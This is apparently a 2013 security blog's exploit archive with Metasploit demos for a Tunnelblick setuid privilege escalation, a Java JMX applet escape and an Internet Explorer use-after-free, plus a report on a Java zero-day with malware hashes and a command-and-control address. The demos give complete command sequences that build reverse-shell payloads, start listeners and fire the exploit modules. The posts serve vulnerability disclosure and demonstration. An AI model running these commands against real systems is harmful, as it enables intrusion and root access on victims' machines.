Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2012-3485 Setuid Tunnelblick Privilege Escalation Metasploit Demo

Exploits, Metasploit, , ,

Timeline :

Vulnerability discovered and reported to the vendor by Jason A. Donenfeld the 2012-08-11
Metasploit PoC provided the 2013-03-03

PoC provided by :

Jason A. Donenfeld
juan vazquez

Reference(s) :

CVE-2012-3485

Affected version(s) :

Tunnelblick 3.2.8 and previous

Tested on Mac OS X 10.7.5 x64 with :

Tunnelblick 3.2.8

Description :

This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 over Mac OS X 10.7.5.

Commands :

Create a OS X x86 payload with msfpayload
msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload

Upload this payload on the victim OS X 10.7.5

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

Execute osx-payload, a session will be created.
This session runs with current user privileges.

use exploit/osx/local/setuid_tunnelblick
set SESSION 1
set PAYLOAD osx/x86/shell_reverse_tcp
set LPORT 4445
set LHOST 192.168.178.26
exploit

id

CVE-2013-1493 aka Yet Another Oracle Java 0day

Exploits, , , , , , , , , ,

Less than 15 days after the release of Oracle Java CPU Special Update of 19 February, another Java 0day is reported exploited in the wild !

FireEye has report, in a blog post, the discovery of a new Oracle Java 0day targeting latest versions JSE 6 Update 41 and JSE 7 Update 15.

After successful exploitation of the newly discovered vulnerability, CVE-2013-1493, “svchost.jpg” (b6c8ede9e2153f2a1e650dfa05b59b99) file is loaded from the same server hosting the Java 0day. Then McRAT (aka Trojan.Naid) malware (4d519bf53a8217adc4c15d15f0815993)  is dropped.  Regarding the detection ratio of this malware (21/46), it seem that the Java 0day could be used in Exploit Pack.

Symantec has report some connections through the new Oracle Java 0day with the Bit9 security incident. In the actual Java 0day security incident case, “appmgmt.dll” file, dropped by “svchost.jpg“, is detected by Symantec as Trojan.Naid. Trojan.Naid sample is connecting 110.173.55.187 C&C server. In the Bit9 security incident case, Trojan.Naid was also present and also connecting to 110.173.55.187 C&C server. Symantec detect this Java 0day as “Trojan.Maljava.B” and regarding associated threat assessment, less than 49 computers were infected and less than 2 websites were used in the watering hole attack.

Some security researchers are actually studying the sample, it is question of days before this 0day will be widely exploited.

We advise you to deactivate Java plug-in execution asap.

Update 2013-03-07:

Samples are appearing on VirusTotal like “svchost.jar” (a721ca9b2ea1c362bd704b57d4d5a280) with an actual detection ratio of 17/46.

CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo

Exploits, Metasploit, , ,

Timeline :

Vulnerability discovered and reported to the vendor by Security Explorations the 2013-01-18
Vulnerability patched by the vendor the 2013-02-01
Vulnerability discovered exploited in the wild by kafeine and EKwatcher the 2013-02-18
Metasploit PoC provided the 2013-02-25

PoC provided by :

Unknown
Adam Gowdiak
SecurityObscurity
juan vazquez

Reference(s) :

CVE-2013-0431
OSVDB-89613
BID-57726
Malware don’t need Coffee
Security Explorations
Security Obscurity

Affected version(s) :

Java SE 7U11 and previous

Tested on Windows 7 Integral SP1 with :

Java SE 7U11

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Commands :

use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

MS13-009 Microsoft Internet Explorer SLayoutRun UAF Metasploit Demo

Exploits, Metasploit, , ,

Timeline :

Vulnerability discovered and reported to vendor by Scott Bell
Coordinated public release of the vulnerability the 2013-02-12
Metasploit PoC provided the 2013-02-21

PoC provided by :

Scott Bell

Reference(s) :

CVE-2013-0025
OSVDB-90122
BID-57830
MS13-009

Affected version(s) :

Internet Explorer 8

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed.

Commands :

use exploit/windows/browser/ms13_009_ie_slayoutrun_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo